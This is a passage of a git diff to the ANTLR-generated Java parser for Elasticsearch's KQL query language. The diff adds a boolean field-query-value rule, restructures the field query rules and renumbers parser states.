KqlBaseParser#fieldName}. * @param ctx the parse tree diff --git a/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlBaseParser.java b/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlBaseParser.java index abc50ac82542b..5c1eb04f57e9a 100644 --- a/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlBaseParser.java +++ b/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlBaseParser.java @@ -25,37 +25,38 @@ class KqlBaseParser extends Parser { protected static final PredictionContextCache _sharedContextCache = new PredictionContextCache(); public static final int - DEFAULT_SKIP=1, AND=2, OR=3, NOT=4, COLON=5, OP_LESS=6, OP_LESS_EQ=7, - OP_MORE=8, OP_MORE_EQ=9, LEFT_PARENTHESIS=10, RIGHT_PARENTHESIS=11, LEFT_CURLY_BRACKET=12, + DEFAULT_SKIP=1, AND=2, OR=3, NOT=4, COLON=5, OP_LESS=6, OP_LESS_EQ=7, + OP_MORE=8, OP_MORE_EQ=9, LEFT_PARENTHESIS=10, RIGHT_PARENTHESIS=11, LEFT_CURLY_BRACKET=12, RIGHT_CURLY_BRACKET=13, UNQUOTED_LITERAL=14, QUOTED_STRING=15, WILDCARD=16; public static final int - RULE_topLevelQuery = 0, RULE_query = 1, RULE_simpleQuery = 2, RULE_notQuery = 3, - RULE_nestedQuery = 4, RULE_nestedSubQuery = 5, RULE_nestedSimpleSubQuery = 6, - RULE_nestedParenthesizedQuery = 7, RULE_matchAllQuery = 8, RULE_parenthesizedQuery = 9, - RULE_rangeQuery = 10, RULE_rangeQueryValue = 11, RULE_existsQuery = 12, - RULE_fieldQuery = 13, RULE_fieldLessQuery = 14, RULE_fieldQueryValue = 15, - RULE_fieldName = 16; + RULE_topLevelQuery = 0, RULE_query = 1, RULE_simpleQuery = 2, RULE_notQuery = 3, + RULE_nestedQuery = 4, RULE_nestedSubQuery = 5, RULE_nestedSimpleSubQuery = 6, + RULE_nestedParenthesizedQuery = 7, RULE_matchAllQuery = 8, RULE_parenthesizedQuery = 9, + RULE_rangeQuery = 10, RULE_rangeQueryValue = 11, RULE_existsQuery = 12, + RULE_fieldQuery = 13, RULE_fieldLessQuery = 14, RULE_fieldQueryValue = 15, + RULE_booleanFieldQueryValue = 16, RULE_fieldName = 17; private static String[] makeRuleNames() { return new String[] { - "topLevelQuery", "query", "simpleQuery", "notQuery", "nestedQuery", "nestedSubQuery", - "nestedSimpleSubQuery", "nestedParenthesizedQuery", "matchAllQuery", - "parenthesizedQuery", "rangeQuery", "rangeQueryValue", "existsQuery", - "fieldQuery", "fieldLessQuery", "fieldQueryValue", "fieldName" + "topLevelQuery", "query", "simpleQuery", "notQuery", "nestedQuery", "nestedSubQuery", + "nestedSimpleSubQuery", "nestedParenthesizedQuery", "matchAllQuery", + "parenthesizedQuery", "rangeQuery", "rangeQueryValue", "existsQuery", + "fieldQuery", "fieldLessQuery", "fieldQueryValue", "booleanFieldQueryValue", + "fieldName" }; } public static final String[] ruleNames = makeRuleNames(); private static String[] makeLiteralNames() { return new String[] { - null, null, "'and'", "'or'", "'not'", "':'", "'<'", "'<='", "'>'", "'>='", + null, null, "'and'", "'or'", "'not'", "':'", "'<'", "'<='", "'>'", "'>='", "'('", "')'", "'{'", "'}'" }; } private static final String[] _LITERAL_NAMES = makeLiteralNames(); private static String[] makeSymbolicNames() { return new String[] { - null, "DEFAULT_SKIP", "AND", "OR", "NOT", "COLON", "OP_LESS", "OP_LESS_EQ", - "OP_MORE", "OP_MORE_EQ", "LEFT_PARENTHESIS", "RIGHT_PARENTHESIS", "LEFT_CURLY_BRACKET", + null, "DEFAULT_SKIP", "AND", "OR", "NOT", "COLON", "OP_LESS", "OP_LESS_EQ", + "OP_MORE", "OP_MORE_EQ", "LEFT_PARENTHESIS", "RIGHT_PARENTHESIS", "LEFT_CURLY_BRACKET", "RIGHT_CURLY_BRACKET", "UNQUOTED_LITERAL", "QUOTED_STRING", "WILDCARD" }; } @@ -142,17 +143,17 @@ public final TopLevelQueryContext topLevelQuery() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(35); + setState(37); _errHandler.sync(this); _la = _input.LA(1); if ((((_la) & ~0x3f) == 0 && ((1L << _la) & 115740L) != 0)) { { - setState(34); + setState(36); query(0); } } - setState(37); + setState(39); match(EOF); } } @@ -173,7 +174,7 @@ public QueryContext(ParserRuleContext parent, int invokingState) { super(parent, invokingState); } @Override public int getRuleIndex() { return RULE_query; } - + public QueryContext() { } public void copyFrom(QueryContext ctx) { super.copyFrom(ctx); @@ -247,11 +248,11 @@ private QueryContext query(int _p) throws RecognitionException { _ctx = _localctx; _prevctx = _localctx; - setState(40); + setState(42); simpleQuery(); } _ctx.stop = _input.LT(-1); - setState(47); + setState(49); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,1,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { @@ -262,9 +263,9 @@ private QueryContext query(int _p) throws RecognitionException { { _localctx = new BooleanQueryContext(new QueryContext(_parentctx, _parentState)); pushNewRecursionContext(_localctx, _startState, RULE_query); - setState(42); + setState(44); if (!(precpred(_ctx, 2))) throw new FailedPredicateException(this, "precpred(_ctx, 2)"); - setState(43); + setState(45); ((BooleanQueryContext)_localctx).operator = _input.LT(1); _la = _input.LA(1); if ( !(_la==AND || _la==OR) ) { @@ -275,12 +276,12 @@ private QueryContext query(int _p) throws RecognitionException { _errHandler.reportMatch(this); consume(); } - setState(44); + setState(46); query(2); } - } + } } - setState(49); + setState(51); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,1,_ctx); } @@ -346,62 +347,62 @@ public final SimpleQueryContext simpleQuery() throws RecognitionException { SimpleQueryContext _localctx = new SimpleQueryContext(_ctx, getState()); enterRule(_localctx, 4, RULE_simpleQuery); try { - setState(58); + setState(60); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,2,_ctx) ) { case 1: enterOuterAlt(_localctx, 1); { - setState(50); + setState(52); notQuery(); } break; case 2: enterOuterAlt(_localctx, 2); { - setState(51); + setState(53); nestedQuery(); } break; case 3: enterOuterAlt(_localctx, 3); { - setState(52); + setState(54); parenthesizedQuery(); } break; case 4: enterOuterAlt(_localctx, 4); { - setState(53); + setState(55); matchAllQuery(); } break; case 5: enterOuterAlt(_localctx, 5); { - setState(54); + setState(56); existsQuery(); } break; case 6: enterOuterAlt(_localctx, 6); { - setState(55); + setState(57); rangeQuery(); } break; case 7: enterOuterAlt(_localctx, 7); { - setState(56); + setState(58); fieldQuery(); } break; case 8: enterOuterAlt(_localctx, 8); { - setState(57); + setState(59); fieldLessQuery(); } break; @@ -450,9 +451,9 @@ public final NotQueryContext notQuery() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(60); + setState(62); match(NOT); - setState(61); + setState(63); ((NotQueryContext)_localctx).subQuery = simpleQuery(); } } @@ -503,15 +504,15 @@ public final NestedQueryContext nestedQuery() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(63); + setState(65); fieldName(); - setState(64); + setState(66); match(COLON); - setState(65); + setState(67); match(LEFT_CURLY_BRACKET); - setState(66); + setState(68); nestedSubQuery(0); - setState(67); + setState(69); match(RIGHT_CURLY_BRACKET); } } @@ -532,7 +533,7 @@ public NestedSubQueryContext(ParserRuleContext parent, int invokingState) { super(parent, invokingState); } @Override public int getRuleIndex() { return RULE_nestedSubQuery; } - + public NestedSubQueryContext() { } public void copyFrom(NestedSubQueryContext ctx) { super.copyFrom(ctx); @@ -606,11 +607,11 @@ private NestedSubQueryContext nestedSubQuery(int _p) throws RecognitionException _ctx = _localctx; _prevctx = _localctx; - setState(70); + setState(72); nestedSimpleSubQuery(); } _ctx.stop = _input.LT(-1); - setState(77); + setState(79); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,3,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { @@ -621,9 +622,9 @@ private NestedSubQueryContext nestedSubQuery(int _p) throws RecognitionException { _localctx = new BooleanNestedQueryContext(new NestedSubQueryContext(_parentctx, _parentState)); pushNewRecursionContext(_localctx, _startState, RULE_nestedSubQuery); - setState(72); + setState(74); if (!(precpred(_ctx, 2))) throw new FailedPredicateException(this, "precpred(_ctx, 2)"); - setState(73); + setState(75); ((BooleanNestedQueryContext)_localctx).operator = _input.LT(1); _la = _input.LA(1); if ( !(_la==AND || _la==OR) ) { @@ -634,12 +635,12 @@ private NestedSubQueryContext nestedSubQuery(int _p) throws RecognitionException _errHandler.reportMatch(this); consume(); } - setState(74); + setState(76); nestedSubQuery(2); } - } + } } - setState(79); + setState(81); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,3,_ctx); } @@ -702,55 +703,55 @@ public final NestedSimpleSubQueryContext nestedSimpleSubQuery() throws Recogniti NestedSimpleSubQueryContext _localctx = new NestedSimpleSubQueryContext(_ctx, getState()); enterRule(_localctx, 12, RULE_nestedSimpleSubQuery); try { - setState(87); + setState(89); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,4,_ctx) ) { case 1: enterOuterAlt(_localctx, 1); { - setState(80); + setState(82); notQuery(); } break; case 2: enterOuterAlt(_localctx, 2); { - setState(81); + setState(83); nestedQuery(); } break; case 3: enterOuterAlt(_localctx, 3); { - setState(82); + setState(84); matchAllQuery(); } break; case 4: enterOuterAlt(_localctx, 4); { - setState(83); + setState(85); nestedParenthesizedQuery(); } break; case 5: enterOuterAlt(_localctx, 5); { - setState(84); + setState(86); existsQuery(); } break; case 6: enterOuterAlt(_localctx, 6); { - setState(85); + setState(87); rangeQuery(); } break; case 7: enterOuterAlt(_localctx, 7); { - setState(86); + setState(88); fieldQuery(); } break; @@ -799,11 +800,11 @@ public final NestedParenthesizedQueryContext nestedParenthesizedQuery() throws R try { enterOuterAlt(_localctx, 1); { - setState(89); + setState(91); match(LEFT_PARENTHESIS); - setState(90); + setState(92); nestedSubQuery(0); - setState(91); + setState(93); match(RIGHT_PARENTHESIS); } } @@ -850,19 +851,19 @@ public final MatchAllQueryContext matchAllQuery() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(95); + setState(97); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,5,_ctx) ) { case 1: { - setState(93); + setState(95); match(WILDCARD); - setState(94); + setState(96); match(COLON); } break; } - setState(97); + setState(99); match(WILDCARD); } } @@ -909,11 +910,11 @@ public final ParenthesizedQueryContext parenthesizedQuery() throws RecognitionEx try { enterOuterAlt(_localctx, 1); { - setState(99); + setState(101); match(LEFT_PARENTHESIS); - setState(100); + setState(102); query(0); - setState(101); + setState(103); match(RIGHT_PARENTHESIS); } } @@ -967,9 +968,9 @@ public final RangeQueryContext rangeQuery() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(103); + setState(105); fieldName(); - setState(104); + setState(106); ((RangeQueryContext)_localctx).operator = _input.LT(1); _la = _input.LA(1); if ( !((((_la) & ~0x3f) == 0 && ((1L << _la) & 960L) != 0)) ) { @@ -980,7 +981,7 @@ public final RangeQueryContext rangeQuery() throws RecognitionException { _errHandler.reportMatch(this); consume(); } - setState(105); + setState(107); rangeQueryValue(); } } @@ -1031,14 +1032,14 @@ public final RangeQueryValueContext rangeQueryValue() throws RecognitionExceptio int _la; try { int _alt; - setState(113); + setState(115); _errHandler.sync(this); switch (_input.LA(1)) { case UNQUOTED_LITERAL: case WILDCARD: enterOuterAlt(_localctx, 1); { - setState(108); + setState(110); _errHandler.sync(this); _alt = 1; do { @@ -1046,7 +1047,7 @@ public final RangeQueryValueContext rangeQueryValue() throws RecognitionExceptio case 1: { { - setState(107); + setState(109); _la = _input.LA(1); if ( !(_la==UNQUOTED_LITERAL || _la==WILDCARD) ) { _errHandler.recoverInline(this); @@ -1062,7 +1063,7 @@ public final RangeQueryValueContext rangeQueryValue() throws RecognitionExceptio default: throw new NoViableAltException(this); } - setState(110); + setState(112); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,6,_ctx); } while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ); @@ -1071,7 +1072,7 @@ public final RangeQueryValueContext rangeQueryValue() throws RecognitionExceptio case QUOTED_STRING: enterOuterAlt(_localctx, 2); { - setState(112); + setState(114); match(QUOTED_STRING); } break; @@ -1122,11 +1123,11 @@ public final ExistsQueryContext existsQuery() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(115); + setState(117); fieldName(); - setState(116); + setState(118); match(COLON); - setState(117); + setState(119); match(WILDCARD); } } @@ -1150,8 +1151,6 @@ public FieldNameContext fieldName() { public FieldQueryValueContext fieldQueryValue() { return getRuleContext(FieldQueryValueContext.class,0); } - public TerminalNode LEFT_PARENTHESIS() { return getToken(KqlBaseParser.LEFT_PARENTHESIS, 0); } - public TerminalNode RIGHT_PARENTHESIS() { return getToken(KqlBaseParser.RIGHT_PARENTHESIS, 0); } public FieldQueryContext(ParserRuleContext parent, int invokingState) { super(parent, invokingState); } @@ -1175,35 +1174,14 @@ public final FieldQueryContext fieldQuery() throws RecognitionException { FieldQueryContext _localctx = new FieldQueryContext(_ctx, getState()); enterRule(_localctx, 26, RULE_fieldQuery); try { - setState(129); - _errHandler.sync(this); - switch ( getInterpreter().adaptivePredict(_input,8,_ctx) ) { - case 1: - enterOuterAlt(_localctx, 1); - { - setState(119); - fieldName(); - setState(120); - match(COLON); - setState(121); - fieldQueryValue(); - } - break; - case 2: - enterOuterAlt(_localctx, 2); - { - setState(123); - fieldName(); - setState(124); - match(COLON); - setState(125); - match(LEFT_PARENTHESIS); - setState(126); - fieldQueryValue(); - setState(127); - match(RIGHT_PARENTHESIS); - } - break; + enterOuterAlt(_localctx, 1); + { + setState(121); + fieldName(); + setState(122); + match(COLON); + setState(123); + fieldQueryValue(); } } catch (RecognitionException re) { @@ -1222,8 +1200,6 @@ public static class FieldLessQueryContext extends ParserRuleContext { public FieldQueryValueContext fieldQueryValue() { return getRuleContext(FieldQueryValueContext.class,0); } - public TerminalNode LEFT_PARENTHESIS() { return getToken(KqlBaseParser.LEFT_PARENTHESIS, 0); } - public TerminalNode RIGHT_PARENTHESIS() { return getToken(KqlBaseParser.RIGHT_PARENTHESIS, 0); } public FieldLessQueryContext(ParserRuleContext parent, int invokingState) { super(parent, invokingState); } @@ -1247,34 +1223,10 @@ public final FieldLessQueryContext fieldLessQuery() throws RecognitionException FieldLessQueryContext _localctx = new FieldLessQueryContext(_ctx, getState()); enterRule(_localctx, 28, RULE_fieldLessQuery); try { - setState(136); - _errHandler.sync(this); - switch (_input.LA(1)) { - case AND: - case OR: - case NOT: - case UNQUOTED_LITERAL: - case QUOTED_STRING: - case WILDCARD: - enterOuterAlt(_localctx, 1); - { - setState(131); - fieldQueryValue(); - } - break; - case LEFT_PARENTHESIS: - enterOuterAlt(_localctx, 2); - { - setState(132); - match(LEFT_PARENTHESIS); - setState(133); - fieldQueryValue(); - setState(134); - match(RIGHT_PARENTHESIS); - } - break; - default: - throw new NoViableAltException(this); + enterOuterAlt(_localctx, 1); + { + setState(125); + fieldQueryValue(); } } catch (RecognitionException re) { @@ -1290,27 +1242,36 @@ public final FieldLessQueryContext fieldLessQuery() throws RecognitionException @SuppressWarnings("CheckReturnValue") public static class FieldQueryValueContext extends ParserRuleContext { - public List AND() { return getTokens(KqlBaseParser.AND); } - public TerminalNode AND(int i) { - return getToken(KqlBaseParser.AND, i); + public Token operator; + public List UNQUOTED_LITERAL() { return getTokens(KqlBaseParser.UNQUOTED_LITERAL); } + public TerminalNode UNQUOTED_LITERAL(int i) { + return getToken(KqlBaseParser.UNQUOTED_LITERAL, i); + } + public List WILDCARD() { return getTokens(KqlBaseParser.WILDCARD); } + public TerminalNode WILDCARD(int i) { + return getToken(KqlBaseParser.WILDCARD, i); } public List OR() { return getTokens(KqlBaseParser.OR); } public TerminalNode OR(int i) { return getToken(KqlBaseParser.OR, i); } + public List AND() { return getTokens(KqlBaseParser.AND); } + public TerminalNode AND(int i) { + return getToken(KqlBaseParser.AND, i); + } public List NOT() { return getTokens(KqlBaseParser.NOT); } public TerminalNode NOT(int i) { return getToken(KqlBaseParser.NOT, i); } - public List UNQUOTED_LITERAL() { return getTokens(KqlBaseParser.UNQUOTED_LITERAL); } - public TerminalNode UNQUOTED_LITERAL(int i) { - return getToken(KqlBaseParser.UNQUOTED_LITERAL, i); + public TerminalNode QUOTED_STRING() { return getToken(KqlBaseParser.QUOTED_STRING, 0); } + public FieldQueryValueContext fieldQueryValue() { + return getRuleContext(FieldQueryValueContext.class,0); } - public List WILDCARD() { return getTokens(KqlBaseParser.WILDCARD); } - public TerminalNode WILDCARD(int i) { - return getToken(KqlBaseParser.WILDCARD, i); + public TerminalNode LEFT_PARENTHESIS() { return getToken(KqlBaseParser.LEFT_PARENTHESIS, 0); } + public BooleanFieldQueryValueContext booleanFieldQueryValue() { + return getRuleContext(BooleanFieldQueryValueContext.class,0); } - public TerminalNode QUOTED_STRING() { return getToken(KqlBaseParser.QUOTED_STRING, 0); } + public TerminalNode RIGHT_PARENTHESIS() { return getToken(KqlBaseParser.RIGHT_PARENTHESIS, 0); } public FieldQueryValueContext(ParserRuleContext parent, int invokingState) { super(parent, invokingState); } @@ -1336,20 +1297,53 @@ public final FieldQueryValueContext fieldQueryValue() throws RecognitionExceptio int _la; try { int _alt; - setState(158); + setState(157); _errHandler.sync(this); - switch ( getInterpreter().adaptivePredict(_input,15,_ctx) ) { + switch ( getInterpreter().adaptivePredict(_input,14,_ctx) ) { case 1: enterOuterAlt(_localctx, 1); { - setState(139); + setState(128); + _errHandler.sync(this); + _alt = 1; + do { + switch (_alt) { + case 1: + { + { + setState(127); + _la = _input.LA(1); + if ( !(_la==UNQUOTED_LITERAL || _la==WILDCARD) ) { + _errHandler.recoverInline(this); + } + else { + if ( _input.LA(1)==Token.EOF ) matchedEOF = true; + _errHandler.reportMatch(this); + consume(); + } + } + } + break; + default: + throw new NoViableAltException(this); + } + setState(130); + _errHandler.sync(this); + _alt = getInterpreter().adaptivePredict(_input,8,_ctx); + } while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ); + } + break; + case 2: + enterOuterAlt(_localctx, 2); + { + setState(133); _errHandler.sync(this); _la = _input.LA(1); - if ((((_la) & ~0x3f) == 0 && ((1L << _la) & 28L) != 0)) { + if (_la==UNQUOTED_LITERAL || _la==WILDCARD) { { - setState(138); + setState(132); _la = _input.LA(1); - if ( !((((_la) & ~0x3f) == 0 && ((1L << _la) & 28L) != 0)) ) { + if ( !(_la==UNQUOTED_LITERAL || _la==WILDCARD) ) { _errHandler.recoverInline(this); } else { @@ -1360,7 +1354,7 @@ public final FieldQueryValueContext fieldQueryValue() throws RecognitionExceptio } } - setState(142); + setState(136); _errHandler.sync(this); _alt = 1; do { @@ -1368,9 +1362,42 @@ public final FieldQueryValueContext fieldQueryValue() throws RecognitionExceptio case 1: { { - setState(141); + setState(135); _la = _input.LA(1); - if ( !(_la==UNQUOTED_LITERAL || _la==WILDCARD) ) { + if ( !((((_la) & ~0x3f) == 0 && ((1L << _la) & 28L) != 0)) ) { + _errHandler.recoverInline(this); + } + else { + if ( _input.LA(1)==Token.EOF ) matchedEOF = true; + _errHandler.reportMatch(this); + consume(); + } + } + } + break; + default: + throw new NoViableAltException(this); + } + setState(138); + _errHandler.sync(this); + _alt = getInterpreter().adaptivePredict(_input,10,_ctx); + } while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ); + } + break; + case 3: + enterOuterAlt(_localctx, 3); + { + setState(141); + _errHandler.sync(this); + _alt = 1; + do { + switch (_alt) { + case 1: + { + { + setState(140); + _la = _input.LA(1); + if ( !(_la==AND || _la==OR) ) { _errHandler.recoverInline(this); } else { @@ -1384,18 +1411,18 @@ public final FieldQueryValueContext fieldQueryValue() throws RecognitionExceptio default: throw new NoViableAltException(this); } - setState(144); + setState(143); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,11,_ctx); } while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ); - setState(147); + setState(146); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,12,_ctx) ) { case 1: { - setState(146); + setState(145); _la = _input.LA(1); - if ( !((((_la) & ~0x3f) == 0 && ((1L << _la) & 28L) != 0)) ) { + if ( !(_la==UNQUOTED_LITERAL || _la==WILDCARD) ) { _errHandler.recoverInline(this); } else { @@ -1408,71 +1435,156 @@ public final FieldQueryValueContext fieldQueryValue() throws RecognitionExceptio } } break; - case 2: - enterOuterAlt(_localctx, 2); + case 4: + enterOuterAlt(_localctx, 4); { - setState(149); - _la = _input.LA(1); - if ( !(_la==AND || _la==OR) ) { - _errHandler.recoverInline(this); - } - else { - if ( _input.LA(1)==Token.EOF ) matchedEOF = true; - _errHandler.reportMatch(this); - consume(); + setState(148); + match(QUOTED_STRING); } + break; + case 5: + enterOuterAlt(_localctx, 5); + { + setState(149); + ((FieldQueryValueContext)_localctx).operator = match(NOT); setState(151); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,13,_ctx) ) { case 1: { setState(150); - _la = _input.LA(1); - if ( !((((_la) & ~0x3f) == 0 && ((1L << _la) & 28L) != 0)) ) { - _errHandler.recoverInline(this); - } - else { - if ( _input.LA(1)==Token.EOF ) matchedEOF = true; - _errHandler.reportMatch(this); - consume(); - } + fieldQueryValue(); } break; } } break; - case 3: - enterOuterAlt(_localctx, 3); + case 6: + enterOuterAlt(_localctx, 6); { setState(153); - match(NOT); + match(LEFT_PARENTHESIS); + setState(154); + booleanFieldQueryValue(0); setState(155); - _errHandler.sync(this); - switch ( getInterpreter().adaptivePredict(_input,14,_ctx) ) { - case 1: + match(RIGHT_PARENTHESIS); + } + break; + } + } + catch (RecognitionException re) { + _localctx.exception = re; + _errHandler.reportError(this, re); + _errHandler.recover(this, re); + } + finally { + exitRule(); + } + return _localctx; + } + + @SuppressWarnings("CheckReturnValue") + public static class BooleanFieldQueryValueContext extends ParserRuleContext { + public Token operator; + public TerminalNode LEFT_PARENTHESIS() { return getToken(KqlBaseParser.LEFT_PARENTHESIS, 0); } + public BooleanFieldQueryValueContext booleanFieldQueryValue() { + return getRuleContext(BooleanFieldQueryValueContext.class,0); + } + public TerminalNode RIGHT_PARENTHESIS() { return getToken(KqlBaseParser.RIGHT_PARENTHESIS, 0); } + public FieldQueryValueContext fieldQueryValue() { + return getRuleContext(FieldQueryValueContext.class,0); + } + public TerminalNode AND() { return getToken(KqlBaseParser.AND, 0); } + public TerminalNode OR() { return getToken(KqlBaseParser.OR, 0); } + public BooleanFieldQueryValueContext(ParserRuleContext parent, int invokingState) { + super(parent, invokingState); + } + @Override public int getRuleIndex() { return RULE_booleanFieldQueryValue; } + @Override + public void enterRule(ParseTreeListener listener) { + if ( listener instanceof KqlBaseListener ) ((KqlBaseListener)listener).enterBooleanFieldQueryValue(this); + } + @Override + public void exitRule(ParseTreeListener listener) { + if ( listener instanceof KqlBaseListener ) ((KqlBaseListener)listener).exitBooleanFieldQueryValue(this); + } + @Override + public T accept(ParseTreeVisitor visitor) { + if ( visitor instanceof KqlBaseVisitor ) return ((KqlBaseVisitor)visitor).visitBooleanFieldQueryValue(this); + else return visitor.visitChildren(this); + } + } + + public final BooleanFieldQueryValueContext booleanFieldQueryValue() throws RecognitionException { + return booleanFieldQueryValue(0); + } + + private BooleanFieldQueryValueContext booleanFieldQueryValue(int _p) throws RecognitionException { + ParserRuleContext _parentctx = _ctx; + int _parentState = getState(); + BooleanFieldQueryValueContext _localctx = new BooleanFieldQueryValueContext(_ctx, _parentState); + BooleanFieldQueryValueContext _prevctx = _localctx; + int _startState = 32; + enterRecursionRule(_localctx, 32, RULE_booleanFieldQueryValue, _p); + int _la; + try { + int _alt; + enterOuterAlt(_localctx, 1); + { + setState(165); + _errHandler.sync(this); + switch ( getInterpreter().adaptivePredict(_input,15,_ctx) ) { + case 1: + { + setState(160); + match(LEFT_PARENTHESIS); + setState(161); + booleanFieldQueryValue(0); + setState(162); + match(RIGHT_PARENTHESIS); + } + break; + case 2: + { + setState(164); + fieldQueryValue(); + } + break; + } + _ctx.stop = _input.LT(-1); + setState(172); + _errHandler.sync(this); + _alt = getInterpreter().adaptivePredict(_input,16,_ctx); + while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { + if ( _alt==1 ) { + if ( _parseListeners!=null ) triggerExitRuleEvent(); + _prevctx = _localctx; { - setState(154); + { + _localctx = new BooleanFieldQueryValueContext(_parentctx, _parentState); + pushNewRecursionContext(_localctx, _startState, RULE_booleanFieldQueryValue); + setState(167); + if (!(precpred(_ctx, 3))) throw new FailedPredicateException(this, "precpred(_ctx, 3)"); + setState(168); + ((BooleanFieldQueryValueContext)_localctx).operator = _input.LT(1); _la = _input.LA(1); if ( !(_la==AND || _la==OR) ) { - _errHandler.recoverInline(this); + ((BooleanFieldQueryValueContext)_localctx).operator = (Token)_errHandler.recoverInline(this); } else { if ( _input.LA(1)==Token.EOF ) matchedEOF = true; _errHandler.reportMatch(this); consume(); } + setState(169); + fieldQueryValue(); } - break; - } - } - break; - case 4: - enterOuterAlt(_localctx, 4); - { - setState(157); - match(QUOTED_STRING); + } } - break; + setState(174); + _errHandler.sync(this); + _alt = getInterpreter().adaptivePredict(_input,16,_ctx); + } } } catch (RecognitionException re) { @@ -1481,7 +1593,7 @@ public final FieldQueryValueContext fieldQueryValue() throws RecognitionExceptio _errHandler.recover(this, re); } finally { - exitRule(); + unrollRecursionContexts(_parentctx); } return _localctx; } @@ -1513,29 +1625,29 @@ public T accept(ParseTreeVisitor visitor) { public final FieldNameContext fieldName() throws RecognitionException { FieldNameContext _localctx = new FieldNameContext(_ctx, getState()); - enterRule(_localctx, 32, RULE_fieldName); + enterRule(_localctx, 34, RULE_fieldName); try { - setState(163); + setState(178); _errHandler.sync(this); switch (_input.LA(1)) { case UNQUOTED_LITERAL: enterOuterAlt(_localctx, 1); { - setState(160); + setState(175); ((FieldNameContext)_localctx).value = match(UNQUOTED_LITERAL); } break; case QUOTED_STRING: enterOuterAlt(_localctx, 2); { - setState(161); + setState(176); ((FieldNameContext)_localctx).value = match(QUOTED_STRING); } break; case WILDCARD: enterOuterAlt(_localctx, 3); { - setState(162); + setState(177); ((FieldNameContext)_localctx).value = match(WILDCARD); } break; @@ -1560,6 +1672,8 @@ public boolean sempred(RuleContext _localctx, int ruleIndex, int predIndex) { return query_sempred((QueryContext)_localctx, predIndex); case 5: return nestedSubQuery_sempred((NestedSubQueryContext)_localctx, predIndex); + case 16: + return booleanFieldQueryValue_sempred((BooleanFieldQueryValueContext)_localctx, predIndex); } return true; } @@ -1577,111 +1691,129 @@ private boolean nestedSubQuery_sempred(NestedSubQueryContext _localctx, int pred } return true; } + private boolean booleanFieldQueryValue_sempred(BooleanFieldQueryValueContext _localctx, int predIndex) { + switch (predIndex) { + case 2: + return precpred(_ctx, 3); + } + return true; + } public static final String _serializedATN = - "\u0004\u0001\u0010\u00a6\u0002\u0000\u0007\u0000\u0002\u0001\u0007\u0001"+ + "\u0004\u0001\u0010\u00b5\u0002\u0000\u0007\u0000\u0002\u0001\u0007\u0001"+ "\u0002\u0002\u0007\u0002\u0002\u0003\u0007\u0003\u0002\u0004\u0007\u0004"+ "\u0002\u0005\u0007\u0005\u0002\u0006\u0007\u0006\u0002\u0007\u0007\u0007"+ "\u0002\b\u0007\b\u0002\t\u0007\t\u0002\n\u0007\n\u0002\u000b\u0007\u000b"+ "\u0002\f\u0007\f\u0002\r\u0007\r\u0002\u000e\u0007\u000e\u0002\u000f\u0007"+ - "\u000f\u0002\u0010\u0007\u0010\u0001\u0000\u0003\u0000$\b\u0000\u0001"+ - "\u0000\u0001\u0000\u0001\u0001\u0001\u0001\u0001\u0001\u0001\u0001\u0001"+ - "\u0001\u0001\u0001\u0005\u0001.\b\u0001\n\u0001\f\u00011\t\u0001\u0001"+ - "\u0002\u0001\u0002\u0001\u0002\u0001\u0002\u0001\u0002\u0001\u0002\u0001"+ - "\u0002\u0001\u0002\u0003\u0002;\b\u0002\u0001\u0003\u0001\u0003\u0001"+ - "\u0003\u0001\u0004\u0001\u0004\u0001\u0004\u0001\u0004\u0001\u0004\u0001"+ - "\u0004\u0001\u0005\u0001\u0005\u0001\u0005\u0001\u0005\u0001\u0005\u0001"+ - "\u0005\u0005\u0005L\b\u0005\n\u0005\f\u0005O\t\u0005\u0001\u0006\u0001"+ - "\u0006\u0001\u0006\u0001\u0006\u0001\u0006\u0001\u0006\u0001\u0006\u0003"+ - "\u0006X\b\u0006\u0001\u0007\u0001\u0007\u0001\u0007\u0001\u0007\u0001"+ - "\b\u0001\b\u0003\b`\b\b\u0001\b\u0001\b\u0001\t\u0001\t\u0001\t\u0001"+ - "\t\u0001\n\u0001\n\u0001\n\u0001\n\u0001\u000b\u0004\u000bm\b\u000b\u000b"+ - "\u000b\f\u000bn\u0001\u000b\u0003\u000br\b\u000b\u0001\f\u0001\f\u0001"+ - "\f\u0001\f\u0001\r\u0001\r\u0001\r\u0001\r\u0001\r\u0001\r\u0001\r\u0001"+ - "\r\u0001\r\u0001\r\u0003\r\u0082\b\r\u0001\u000e\u0001\u000e\u0001\u000e"+ - "\u0001\u000e\u0001\u000e\u0003\u000e\u0089\b\u000e\u0001\u000f\u0003\u000f"+ - 